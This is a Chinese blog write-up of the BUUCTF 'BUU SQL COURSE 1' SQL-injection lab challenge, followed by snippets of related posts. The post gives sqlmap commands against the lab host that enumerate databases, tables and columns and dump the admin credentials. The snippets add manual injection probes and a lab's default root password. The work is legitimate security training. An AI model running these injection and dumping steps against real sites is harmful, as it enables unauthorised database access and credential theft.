BUUCTF刷题笔记—Basic—BUU SQL COURSE 1

于 2024-08-17 18:40:20 发布
阅读量314 收藏 6
点赞数 3
文章标签: 笔记 sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43176656/article/details/141284764
版权

使用sqlmap解题Basic—BUU SQL COURSE 1
打开页面,有登录和热点测试新闻1、2、3,开发者模式发现?id=1的参数模式,尝试使用sqlmap解题
在这里插入图片描述
在这里插入图片描述

windows环境sqlmap下载和安装参考:https://editor.csdn.net/md/?articleId=141284540
1.sqlmap下载:http://sqlmap.org/
解压sqlmapproject-sqlmap-1.8.8-0-g8b55644.zip到E:\softhome目录
2.目录修改为sqlmap
3.在E:\softhome\sqlmap打开cmd命令窗口,输入命令
python sqlmap.py -u http://ad3b72b4-56a0-4aba-86f1-00c232c0d053.node5.buuoj.cn:81/backend/content_detail.php?id=2
在这里插入图片描述
在这里插入图片描述

1.暴库
1.1.暴出所有库
python sqlmap.py -u http://b9ca0c42-fc98-4e2d-938a-c4b1d0813dfd.node5.buuoj.cn:81/backend/content_detail.php?id=1 --dbs
1.2.暴出当前所在库的表
python sqlmap.py -u http://b9ca0c42-fc98-4e2d-938a-c4b1d0813dfd.node5.buuoj.cn:81/backend/content_detail.php?id=1 --current-db

2.暴表
2.1.暴出所有数据表
python sqlmap.py -u http://b9ca0c42-fc98-4e2d-938a-c4b1d0813dfd.node5.buuoj.cn:81/backend/content_detail.php?id=1 -D news --tables
2.2.暴出指定数据表的字段
python sqlmap.py -u http://b9ca0c42-fc98-4e2d-938a-c4b1d0813dfd.node5.buuoj.cn:81/backend/content_detail.php?id=1 -D news -T admin --columns
2.3.暴出指定数据表的数据
python sqlmap.py -u http://b9ca0c42-fc98-4e2d-938a-c4b1d0813dfd.node5.buuoj.cn:81/backend/content_detail.php?id=1 -D news -T admin -C id,password,username --dump

在这里插入图片描述
在这里插入图片描述
照着命令执行
在这里插入图片描述
登录admin/e5ede2976384652693e7c2d0a0ace014即可看到flag
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

luxyon
关注
[初级]sql注入之BUU SQL COURSE 1(爆库、表)
BlingZeng的博客
02-07 3853
这是一道选取自BUUCTF线上平台的sql注入题目,难度为初级。和大家一起学习分享
BUUCTF/BUU SQL COURSE 1
weixin_44041994的博客
03-19 594
登录按钮点击后是一个登陆界面,随意输入字符点击后显示提示信息"用户名或密码错误",并且抓包发现是提交的POST请求,可以对该登录界面进行暴破操作,但是因为需要猜解两个字段内容且密码内容无提示,时间需求比较久,且需要较庞大的字典。通过判断可知contents表应为热点新闻的数据表,admin大概率为用户表,所以我们构建sql根据表名查询该表下的各字段名,成功得到字段名:id,username,password。热点按钮显示热点列表,有三个新闻,里面只有无意义的字符串,但是地址栏显示了/content/1。
【CTF练习】BUU SQL COURSE 1
m0_73866435的博客
01-30 699
首先根据题目sql,那么我想着肯定考的是sql注入吧,那么页面显示有4个可点击,
BUUCTF Basic 解题记录--BUU SQL COURSE 1
weixin_43171033的博客
09-14 2229
BUUCTF Basic 解题记录--BUU SQL COURSE 1
BUUCTFBUU SQL COURSE 1
weixin_63442046的博客
04-28 2209
关于BUU SQL COURSE 1的思路
BUUCTF basic BUU SQL COURSE 1
网安小趴菜
08-25 1144
BUUCTF basic BUU SQL COURSE 1
Buuctf | BUU SQL COURSE 1
m_de_g的博客
12-27 6892
BUU SQL COURSE 1 一、题目下载 https://buuoj.cn/challenges#BUU%20SQL%20COURSE%201 二、实战化演练 1.直接使用弱口令来进行测试 2.经过多次的测试,都无法注入,说明这个是写死的注册和登录,左边不是有热点吗?查看了一下跳转 3.通过访问backend/content_detail.php?id=1 4.通过修改后面的id=1,2,3,均会返回信息,直接使用SQL查询语句 1 and 1=1 5.我们尝试使用 1 and 1=2
BUU SQL COURSE 1
Lumos427的博客
05-18 2846
BUU SQL COURSE 1 01 注入点的查找 虽然页面上有登陆框,但是登录框里没有注入点,怎么测试都是用户名密码错误 当点进一个测试新闻里面,查看net就可以发现有提示的注入点 我们可以在url后加上来开始注入 02注入 ?id=1 order by 1 ?id=1 order by 2 ?id=1 order by 3 将页面上回显的字符串进行unicode解码,出现了下面的字符串, 可以发现,当列数为3时就没有了回显,所以进行注入的列数是两列 ?id=-1 union select 1,
BUU SQL COURSE 1 1(SQL注入)
小谢的博客
10-25 3254
BUU SQL COURSE 1 1(SQL注入)题解
[Writeup]BUU SQL COURSE1[入门级]
小飒的博客
06-08 724
观察网址,好像找到注入点 获得数据库 ctftraining获得表名 FLAG_TABLE获得列名 FLAG_COLUMN获得数据时发现数据是空的,只能想另外办法 看能不能登录news的数据库下找到 admin的密码:67fef29ef7beb75f567587f135fa26a0 获得flag payload: 使用sqlmap burp里直接可以找到注入点...
buuctf 逆向刷题01——reverse1
qq_42642222的博客
11-03 1876
仅作学习ctf逆向的buu刷题记录,不定期更新,大佬轻拍。
BUUCTF初学解题记录——Basic
u010152530的博客
05-04 5954
目录Linux LabBUU LFI COURSE 1Upload-Labs-LinuxBUU CODE REVIEW 1BUU BRUTE 1未完待续。。。 Linux Lab # 地址和端口为示例,需要更改为动态分配后的地址和端口 ssh root@node233.buuoj.cn -p 233 # 输入默认密码123456 cat /flag.txt # 输出flag: # flag{ef2a6029-xxxx-xxxx-xxxx-86fb808b12f2} # 一开始以为只要大括号的内容就行了。。。
【CTF练习】BUU SQL COURSE 1,2024年最新网络安全开发6年了
2401_84253089的博客
04-10 981
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。id=-1 的使用是为了确保原始查询返回一个空集,从而避免与注入部分有重叠的数据。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
BUUCTFBUU SQL COURSE 1 1
qq_41369524的博客
12-10 1601
进到burp里面看:id=1,id=2。推断可能是根据SQL查询得到的不同界面结果。例如select * from 表名 where id=1;再试一次,发现原来是之前粘贴少了一个字母,成功拿到flag。试试3,试试2,发现2有回显,所以试探出该表有两列。看到了username和password。先审题,题目名字应该是关于SQL注入的。没有结果,考虑一下MD5解密,解不了。在界面随便点点,发现是POST。首先,判断其是字符型还是数字型。返回结果相同,所以是数字型。得到用户名是admin。
BUU SQL COURSE 2
最新发布
08-31
BUU SQL COURSE 2可能是针对SQL技能提升的课程,但具体内容无法得知,因为没有具体的信息提供。通常这类课程会覆盖SQL的高级知识点,比如事务处理、存储过程、触发器、高级查询技巧、性能优化、索引的使用等。学习这类课程可以帮助数据库管理员、数据分析师以及程序员等提升对SQL语言的掌握能力,进而更高效地管理数据库和开发应用程序。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值